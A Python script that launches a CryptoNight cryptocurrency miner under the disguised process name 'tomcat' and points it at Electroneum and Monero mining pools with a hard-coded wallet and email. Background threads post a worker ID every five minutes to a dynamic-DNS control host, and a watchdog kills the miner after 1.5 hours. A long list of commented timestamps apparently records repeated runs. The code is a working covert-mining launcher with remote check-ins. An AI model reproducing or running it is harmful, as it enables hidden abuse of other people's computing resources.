import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:06.138878
#2018-02-17 17:15:07.837233
#2018-02-17 19:04:03.500542
#2018-02-17 20:51:06.950090
#2018-02-17 22:38:07.355277
#2018-02-18 00:22:05.194790
#2018-02-18 02:13:01.840169
#2018-02-18 04:00:04.649093
#2018-02-18 05:51:04.199294
#2018-02-18 07:43:01.943192
#2018-02-18 09:31:01.404123
#2018-02-18 11:17:03.976614
#2018-02-18 13:03:05.587511
#2018-02-18 14:52:03.525952
#2018-02-18 16:41:07.982013
#2018-02-18 18:30:01.615449
#2018-02-18 20:17:05.860991
#2018-02-18 22:02:01.663425
#2018-02-18 23:51:07.390903
#2018-02-19 01:37:06.280636
#2018-02-19 03:25:04.084841
#2018-02-19 05:10:09.258448
#2018-02-19 06:55:01.346263
#2018-02-19 08:44:06.238693
#2018-02-19 10:33:08.244850
#2018-02-19 12:22:07.166571
#2018-02-19 14:10:02.884937
#2018-02-19 15:57:09.248651
#2018-02-19 17:46:07.061177
#2018-02-19 19:31:08.994078
#2018-02-19 21:18:06.877677
#2018-02-19 23:04:02.056993
#2018-02-20 00:49:01.648599
#2018-02-20 02:39:05.171390
#2018-02-20 04:28:07.229606
#2018-02-20 06:13:06.150912
#2018-02-20 07:58:03.904852
#2018-02-20 09:43:01.730550
#2018-02-20 11:27:08.415724
#2018-02-20 13:14:07.296556
#2018-02-20 14:59:05.831450
#2018-02-20 16:45:14.431038
#2018-02-20 18:33:07.168192
#2018-02-20 20:25:06.543276
#2018-02-20 22:10:05.411933
#2018-02-20 23:52:05.857208
#2018-02-21 01:38:08.731674
#2018-02-21 03:27:06.621905
#2018-02-21 05:15:06.761179
#2018-02-21 07:04:08.064600
#2018-02-21 08:50:09.965831
#2018-02-21 10:38:07.673654
#2018-02-21 12:27:02.007876
#2018-02-21 14:14:06.857575
#2018-02-21 16:01:08.494146
#2018-02-21 17:52:08.723223
#2018-02-21 19:38:08.783990
#2018-02-21 21:25:09.379374
#2018-02-21 23:12:07.758259
#2018-02-22 00:59:04.329876
#2018-02-22 02:47:07.256721
#2018-02-22 04:34:06.935160
#2018-02-22 06:19:03.543029
#2018-02-22 08:06:05.977917
#2018-02-22 09:52:09.301164
#2018-02-22 11:38:04.586001
#2018-02-22 13:25:05.313267
#2018-02-22 15:13:06.608914
#2018-02-22 16:57:06.399279
#2018-02-22 18:45:09.084608
#2018-02-22 20:37:04.255611
#2018-02-22 22:22:04.195158
#2018-02-23 00:08:07.474727
#2018-02-23 01:56:01.876191
#2018-02-23 03:43:05.249723
#2018-02-23 05:28:07.792174
#2018-02-23 07:14:01.220825
#2018-02-23 09:19:07.542495
#2018-02-23 11:24:05.196853
#2018-02-23 13:14:01.748561
#2018-02-23 14:58:09.777561
#2018-02-23 16:46:04.776865
#2018-02-23 18:42:08.748552
#2018-02-23 20:28:01.622925
#2018-02-23 22:15:07.652986
#2018-02-24 00:02:01.664707
#2018-02-24 01:51:06.262259
#2018-02-24 03:43:01.239935
#2018-02-24 05:31:04.403962
#2018-02-24 07:17:03.993573
#2018-02-24 09:07:01.487678
#2018-02-24 10:42:01.435343
#2018-02-24 12:26:06.267199
#2018-02-24 14:03:04.269046
#2018-02-24 15:30:09.419156
#2018-02-24 17:16:02.231309
#2018-02-24 18:48:07.392659
#2018-02-24 20:20:07.447994
#2018-02-24 21:50:05.469729
#2018-02-25 00:32:05.461709
#2018-02-25 03:49:01.906955
#2018-02-25 07:25:08.144409